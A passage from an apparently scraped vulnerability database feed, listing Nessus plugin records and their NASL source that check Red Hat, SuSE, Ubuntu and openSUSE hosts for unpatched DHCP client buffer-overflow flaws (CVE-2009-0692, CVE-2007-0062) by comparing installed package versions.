audit(AUDIT_UNKNOWN_APP_VER, \"Red Hat\");\n\n flag = 0;\nif (sp == \"7\") { if (rpm_check(release:\"RHEL4\", sp:\"7\", reference:\"dhclient-3.0.1-62.el4_7.1\")) flag++; }\n else { if (rpm_check(release:\"RHEL4\", reference:\"dhclient-3.0.1-65.el4_8.1\")) flag++; }\n\nif (sp == \"7\") { if (rpm_check(release:\"RHEL4\", sp:\"7\", reference:\"dhcp-3.0.1-62.el4_7.1\")) flag++; }\n else { if (rpm_check(release:\"RHEL4\", reference:\"dhcp-3.0.1-65.el4_8.1\")) flag++; }\n\nif (sp == \"7\") { if (rpm_check(release:\"RHEL4\", sp:\"7\", reference:\"dhcp-devel-3.0.1-62.el4_7.1\")) flag++; }\n else { if (rpm_check(release:\"RHEL4\", reference:\"dhcp-devel-3.0.1-65.el4_8.1\")) flag++; }\n\n\n if (flag)\n {\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get() + redhat_report_package_caveat()\n );\n exit(0);\n }\n else\n {\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhclient / dhcp / dhcp-devel\");\n }\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:54:11", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might be caught by the buffer overflow checking in newer distributions. (SLES 10 and 11).", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE 10 Security Update : dhclient (ZYPP Patch Number 6335)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_DHCP-6335.NASL", "href": "https://www.tenable.com/plugins/nessus/41502", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41502);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\");\n\n script_name(english:\"SuSE 10 Security Update : dhclient (ZYPP Patch Number 6335)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The DHCP client (dhclient) could be crashed by a malicious DHCP server\nsending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might be\ncaught by the buffer overflow checking in newer distributions. (SLES\n10 and 11).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0692.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 6335.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dhcp-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:2, reference:\"dhcp-client-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-client-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-devel-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-relay-3.0.3-23.55\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:2, reference:\"dhcp-server-3.0.3-23.55\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:51:28", "description": "It was discovered that the DHCP client as included in dhcp3 did not verify the length of certain option fields when processing a response from an IPv4 dhcp server. If a user running Ubuntu 6.06 LTS or 8.04 LTS connected to a malicious dhcp server, a remote attacker could cause a denial of service or execute arbitrary code as the user invoking the program, typically the 'dhcp' user. For users running Ubuntu 8.10 or 9.04, a remote attacker should only be able to cause a denial of service in the DHCP client. In Ubuntu 9.04, attackers would also be isolated by the AppArmor dhclient3 profile.\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Ubuntu security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {}, "published": "2009-07-15T00:00:00", "type": "nessus", "title": "Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : dhcp3 vulnerability (USN-803-1)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:canonical:ubuntu_linux:dhcp-client", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-client", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-client-udeb", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-common", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-dev", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-relay", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-server", "p-cpe:/a:canonical:ubuntu_linux:dhcp3-server-ldap", "cpe:/o:canonical:ubuntu_linux:6.06:-:lts", "cpe:/o:canonical:ubuntu_linux:8.04:-:lts", "cpe:/o:canonical:ubuntu_linux:8.10", "cpe:/o:canonical:ubuntu_linux:9.04"], "id": "UBUNTU_USN-803-1.NASL", "href": "https://www.tenable.com/plugins/nessus/39800", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Ubuntu Security Notice USN-803-1. The text \n# itself is copyright (C) Canonical, Inc. See \n# <http://www.ubuntu.com/usn/>. Ubuntu(R) is a registered \n# trademark of Canonical, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(39800);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2009-0692\");\n script_xref(name:\"USN\", value:\"803-1\");\n\n script_name(english:\"Ubuntu 6.06 LTS / 8.04 LTS / 8.10 / 9.04 : dhcp3 vulnerability (USN-803-1)\");\n script_summary(english:\"Checks dpkg output for updated packages.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\n\"The remote Ubuntu host is missing one or more security-related\npatches.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"It was discovered that the DHCP client as included in dhcp3 did not\nverify the length of certain option fields when processing a response\nfrom an IPv4 dhcp server. If a user running Ubuntu 6.06 LTS or 8.04\nLTS connected to a malicious dhcp server, a remote attacker could\ncause a denial of service or execute arbitrary code as the user\ninvoking the program, typically the 'dhcp' user. For users running\nUbuntu 8.10 or 9.04, a remote attacker should only be able to cause a\ndenial of service in the DHCP client. In Ubuntu 9.04, attackers would\nalso be isolated by the AppArmor dhclient3 profile.\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Ubuntu security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://usn.ubuntu.com/803-1/\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-client-udeb\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-common\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-dev\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-server\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:canonical:ubuntu_linux:dhcp3-server-ldap\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:6.06:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.04:-:lts\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:8.10\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:canonical:ubuntu_linux:9.04\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/14\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/07/15\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"Ubuntu Security Notice (C) 2009-2019 Canonical, Inc. / NASL script (C) 2009-2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Ubuntu Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/cpu\", \"Host/Ubuntu\", \"Host/Ubuntu/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"ubuntu.inc\");\ninclude(\"misc_func.inc\");\n\nif ( ! get_kb_item(\"Host/local_checks_enabled\") ) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/Ubuntu/release\");\nif ( isnull(release) ) audit(AUDIT_OS_NOT, \"Ubuntu\");\nrelease = chomp(release);\nif (! ereg(pattern:\"^(6\\.06|8\\.04|8\\.10|9\\.04)$\", string:release)) audit(AUDIT_OS_NOT, \"Ubuntu 6.06 / 8.04 / 8.10 / 9.04\", \"Ubuntu \" + release);\nif ( ! get_kb_item(\"Host/Debian/dpkg-l\") ) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Ubuntu\", cpu);\n\nflag = 0;\n\nif (ubuntu_check(osver:\"6.06\", pkgname:\"dhcp3-client\", pkgver:\"3.0.3-6ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"dhcp3-client-udeb\", pkgver:\"3.0.3-6ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"dhcp3-common\", pkgver:\"3.0.3-6ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"dhcp3-dev\", pkgver:\"3.0.3-6ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"dhcp3-relay\", pkgver:\"3.0.3-6ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"6.06\", pkgname:\"dhcp3-server\", pkgver:\"3.0.3-6ubuntu7.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"dhcp3-client\", pkgver:\"3.0.6.dfsg-1ubuntu9.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"dhcp3-client-udeb\", pkgver:\"3.0.6.dfsg-1ubuntu9.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"dhcp3-common\", pkgver:\"3.0.6.dfsg-1ubuntu9.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"dhcp3-dev\", pkgver:\"3.0.6.dfsg-1ubuntu9.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"dhcp3-relay\", pkgver:\"3.0.6.dfsg-1ubuntu9.1\")) flag++;\nif (ubuntu_check(osver:\"8.04\", pkgname:\"dhcp3-server\", pkgver:\"3.0.6.dfsg-1ubuntu9.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-client\", pkgver:\"3.1.1-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-client-udeb\", pkgver:\"3.1.1-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-common\", pkgver:\"3.1.1-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-dev\", pkgver:\"3.1.1-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-relay\", pkgver:\"3.1.1-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-server\", pkgver:\"3.1.1-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"8.10\", pkgname:\"dhcp3-server-ldap\", pkgver:\"3.1.1-1ubuntu2.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp-client\", pkgver:\"3.1.1-5ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-client\", pkgver:\"3.1.1-5ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-client-udeb\", pkgver:\"3.1.1-5ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-common\", pkgver:\"3.1.1-5ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-dev\", pkgver:\"3.1.1-5ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-relay\", pkgver:\"3.1.1-5ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-server\", pkgver:\"3.1.1-5ubuntu8.1\")) flag++;\nif (ubuntu_check(osver:\"9.04\", pkgname:\"dhcp3-server-ldap\", pkgver:\"3.1.1-5ubuntu8.1\")) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : ubuntu_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = ubuntu_pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp-client / dhcp3-client / dhcp3-client-udeb / dhcp3-common / etc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:54:51", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending an overlong subnet field. Under some circumstances remote code execution might be possible by exploiting the resulting buffer overflow. This issue has been tracked by CVE-2009-0692.", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE9 Security Update : dhcp-client (YOU Patch Number 12447)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-14T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE9_12447.NASL", "href": "https://www.tenable.com/plugins/nessus/41310", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41310);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\");\n\n script_name(english:\"SuSE9 Security Update : dhcp-client (YOU Patch Number 12447)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 9 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The DHCP client (dhclient) could be crashed by a malicious DHCP server\nsending an overlong subnet field. Under some circumstances remote code\nexecution might be possible by exploiting the resulting buffer\noverflow. This issue has been tracked by CVE-2009-0692.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0692.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply YOU patch number 12447.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/07/03\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 9 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SUSE9\", reference:\"dhcp-client-3.0.1rc13-28.26\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:53:52", "description": "The DHCP client (dhclient) could be crashed by a malicious DHCP server sending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might be caught by the buffer overflow checking in newer distributions. (SLES 10 and 11).", "cvss3": {}, "published": "2009-09-24T00:00:00", "type": "nessus", "title": "SuSE 11 Security Update : dhcp-client (SAT Patch Number 1041)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2009-0692"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:dhcp-client", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_DHCP-CLIENT-090626.NASL", "href": "https://www.tenable.com/plugins/nessus/41383", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(41383);\n script_version(\"1.11\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2009-0692\");\n\n script_name(english:\"SuSE 11 Security Update : dhcp-client (SAT Patch Number 1041)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 11 host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"The DHCP client (dhclient) could be crashed by a malicious DHCP server\nsending a overlong subnet field. (CVE-2009-0692)\n\nIn some circumstances code execution might be possible, but might be\ncaught by the buffer overflow checking in newer distributions. (SLES\n10 and 11).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=515599\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2009-0692.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 1041.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/06/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/09/24\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (pl) audit(AUDIT_OS_NOT, \"SuSE 11.0\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"i586\", reference:\"dhcp-client-3.1.1-7.13.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:0, cpu:\"x86_64\", reference:\"dhcp-client-3.1.1-7.13.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:0, reference:\"dhcp-client-3.1.1-7.13.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-08T14:45:06", "description": "This update contains a backported patch from dhcp-3.0.7 to fix a buffer overflow which could lead to a denial-of-service condition in cases when the dhcp server is configured to send many DHCP options to clients. (CVE-2007-0062)", "cvss3": {}, "published": "2009-02-19T00:00:00", "type": "nessus", "title": "openSUSE 10 Security Update : dhcp (dhcp-5958)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2007-0062"], "modified": "2021-01-14T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:dhcp", "p-cpe:/a:novell:opensuse:dhcp-client", "p-cpe:/a:novell:opensuse:dhcp-devel", "p-cpe:/a:novell:opensuse:dhcp-relay", "p-cpe:/a:novell:opensuse:dhcp-server", "cpe:/o:novell:opensuse:10.3"], "id": "SUSE_DHCP-5958.NASL", "href": "https://www.tenable.com/plugins/nessus/35715", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update dhcp-5958.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(35715);\n script_version(\"1.9\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/14\");\n\n script_cve_id(\"CVE-2007-0062\");\n\n script_name(english:\"openSUSE 10 Security Update : dhcp (dhcp-5958)\");\n script_summary(english:\"Check for the dhcp-5958 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote openSUSE host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This update contains a backported patch from dhcp-3.0.7 to fix a\nbuffer overflow which could lead to a denial-of-service condition in\ncases when the dhcp server is configured to send many DHCP options to\nclients. (CVE-2007-0062)\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Update the affected dhcp packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_cwe_id(119,189);\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-client\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-relay\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:dhcp-server\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:10.3\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2009/01/23\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2009/02/19\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2009-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE10\\.3)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"10.3\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-3.0.6-24.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-client-3.0.6-24.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-devel-3.0.6-24.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-relay-3.0.6-24.2\") ) flag++;\nif ( rpm_check(release:\"SUSE10.3\", reference:\"dhcp-server-3.0.6-24.2\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"dhcp\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-12-06T15:07:27", "description": "A vulnerability has been found and corrected in 